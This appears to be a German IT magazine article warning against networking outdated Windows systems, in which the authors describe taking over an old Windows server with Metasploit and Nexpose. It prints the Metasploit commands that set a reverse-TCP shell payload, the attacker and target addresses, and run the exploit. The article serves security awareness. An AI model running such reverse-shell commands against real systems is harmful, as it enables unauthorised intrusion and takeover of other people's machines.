Windows-Oldtimer

Nicht ins Netz mit alten Systemen!

Thomas Bär, der seit Ende der neunziger Jahre in der IT tätig ist, bringt weit reichende Erfahrungen bei der Einführung und Umsetzung von IT-Prozessen im Gesundheitswesen mit. Dieses in der Praxis gewonnene Wissen hat er seit Anfang 2000 in zahlreichen Publikationen als Fachjournalist in einer großen Zahl von Artikeln umgesetzt. Er lebt und arbeitet in Günzburg.
Frank-Michael Schlede arbeitet seit den achtziger Jahren in der IT und ist seit 1990 als Trainer und Fachjournalist tätig. Nach unterschiedlichen Tätigkeiten als Redakteur und Chefredakteur in verschiedenen Verlagen arbeitet er seit Ende 2009 als freier IT-Journalist für verschiedene Online- und Print-Publikationen. Er lebt und arbeitet in Pfaffenhofen an der Ilm.

Irrglauben: "Hacking ist kompliziert, da passiert schon nichts!"

Das "Hacking", das unerlaubte und möglichst unbemerkte Eindringen auf einen PC oder in eine Netzwerkstruktur, gilt gemeinhin als "hohe Kunst" in der IT. Hohes technisches Wissen, gepaart mit krimineller Energie, wird den Personen nachgesagt, die sich dem Hacking verschreiben haben.

Wir haben uns einmal selbst daran versucht, ein altes, aber noch produktives Windows NT-System, ohne die passende Erlaubnis und ohne das Wissen der Administrationsberechtigung, über das Netzwerk übernehmen zu wollen. Die Standard-Applikationen für derlei "Penetration Testings" sind Metasploit und Nexpose von Rapid7. Für das Herunterladen, das Aufsetzen der virtuellen Maschine mit Windows Server 2003 Betriebssystem und den ersten Einblick der Software benötigten wir zirka vier Stunden.

Eine Attacke auf ein altes Windows-System ist viel einfacher, als so mancher denkt: Gerade einmal vier Stunden inklusive Vorbereitungs- und Installationszeit benötigten die Autoren für einen erfolgreichen Hack.
Eine Attacke auf ein altes Windows-System ist viel einfacher, als so mancher denkt: Gerade einmal vier Stunden inklusive Vorbereitungs- und Installationszeit benötigten die Autoren für einen erfolgreichen Hack.
Foto: Thomas Bär / Frank-Michael Schlede

Erschreckend einfach: Welche Sicherheitslücken die Software auf einem Zielrechner als "wahrscheinlich" einstuft, gibt Nexpose freizügig aus. In der Konsole von Metasploit mussten wir anschließend lediglich vier Eingaben vornehmen, ehe wir direkt in der Eingabeaufforderung des NT-Rechners landeten. Mit "set PAYLOAD generic/shell_reverse_tcp" wird die gewünschte "Sicherheitslücke" anvisiert, mit "set LHOST 10.117.21.123" definierten wir unsere Maschine als ausführenden Angreifer und mit "set RHOST 10.117.18.104" das Ziel. Das Kommando "exploit" führt den gewünschten Befehl aus und keine zehn Sekunden später konnten wir alle administrativen Befehle auf dem Zielrechner ausführen!

Das hätte genauso gut ein Windows 2000 oder XP-Computer mit fehlenden Patches sein können, wie das Internet-Video "Shell Root" auf YouTube eindrucksvoll zeigt. Uns geht es bei diesem Hinweis natürlich nicht darum, dem strafrechtlich relevanten "Hacking" Vorschub zu leisten; eher möchten wir Sie als Leser auf diese "reale Gefahr" hinweisen und zeigen, wie leicht es ist, ein solches System zu kompromittieren.

Zur Startseite